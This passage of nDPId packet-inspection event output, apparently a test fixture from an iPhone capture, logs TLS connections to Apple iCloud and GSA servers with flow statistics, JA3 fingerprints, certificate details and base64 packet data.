{"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599396,"flow_last_seen":1582454599396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599396,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454599396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599396,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGwFLAqAIREYmmI8WZAbu9h96xAAAAALDC\/\/9bXgAAAgQFtAEDAwcBAQgKEd\/rCQAAAAAEAgAA"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599225,"flow_last_seen":1582454599225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599225,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454599225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599225,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WYAbuypew6AAAAALDC\/\/9PDwAAAgQFtAEDAwcBAQgKEd\/qGwAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454599259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599259,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZj0WnUXsqXsO6BScSAj8wAAAgQFrAEBCApbEwn1Ed\/qGwEDAwU="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1582454599261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599261,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WYAbuypew79Fp1GIAQBAu8hwAAAQEIChHf6p1bEwn1"}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599396,"flow_last_seen":1582454599396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599396,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454599396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599396,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGwFLAqAIREYmmI8WZAbu9h96xAAAAALDC\/\/9bXgAAAgQFtAEDAwcBAQgKEd\/rCQAAAAAEAgAA"}
00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1582454599396,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1582454599396,"pkt":"AQBeAAD7xGGLNYKpCABFAABeopUAAP8RdUTAqAIR4AAA+xTpFOkASvALAAAAAAABAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAwAAQAAKQWgAAARlAASAAQADgAA5mGLNYKpxGGLNYKp"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1582454599568,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454599568,"pkt":"MzMAAAACxGGLNYKpht1gCzl3ABA6\/\/6AAAAAAAAACCM\/F4KYopz\/AgAAAAAAAAAAAAAAAAAChQA9fgAAAAABAcRhizWCqQ=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454599585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599585,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAACsGFVcRiaYjwKgCEQG7xZn\/hRwvvYfesqBS\/\/9NtwAAAgQFrAQCCArKEDlZEd\/rCQEDAws="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1582454599602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599602,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGwF7AqAIREYmmI8WZAbu9h96y\/4UcMIAQBAt3qQAAAQEIChHf7BTKEDlZ"}
00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599740,"flow_last_seen":1582454599740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599740,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454599740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599740,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WaAbsCzUbDAAAAALDC\/\/+ibQAAAgQFtAEDAwcBAQgKEd\/sCwAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454599774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599774,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC0GCMAR+LBLwKgCEQG7xZq3FAeKAs1GxKBScSAgIAAAAgQFrAEBCApbEwv6Ed\/sCwEDAwU="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454599776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WaAbsCzUbEtxQHi4AQBAu4qgAAAQEIChHf7JdbEwv6"}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}}
00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454599585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599585,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAACsGFVcRiaYjwKgCEQG7xZn\/hRwvvYfesqBS\/\/9NtwAAAgQFrAQCCArKEDlZEd\/rCQEDAws="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1582454599602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599602,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGwF7AqAIREYmmI8WZAbu9h96y\/4UcMIAQBAt3qQAAAQEIChHf7BTKEDlZ"}
00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599396,"flow_last_seen":1582454599603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599740,"flow_last_seen":1582454599740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599740,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454599740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599740,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WaAbsCzUbDAAAAALDC\/\/+ibQAAAgQFtAEDAwcBAQgKEd\/sCwAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454599774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599774,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC0GCMAR+LBLwKgCEQG7xZq3FAeKAs1GxKBScSAgIAAAAgQFrAEBCApbEwv6Ed\/sCwEDAwU="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454599776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WaAbsCzUbEtxQHi4AQBAu4qgAAAQEIChHf7JdbEwv6"}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599740,"flow_last_seen":1582454599776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":325,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599396,"flow_last_seen":1582454599793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599793,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01232{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599396,"flow_last_seen":1582454599794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4308,"flow_avg_l4_payload_len":538,"midstream":0,"thread_ts_msec":1582454599794,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsa.apple.com","server_names":"gsas.apple.com,gsa.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gsa.apple.com, O=Apple Inc., ST=California, C=US","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D4:EF:5E:AD:7F:D5:13:5B:9F:B2:B9:84:19:75:BB:ED:53:FB:18:D6"}}
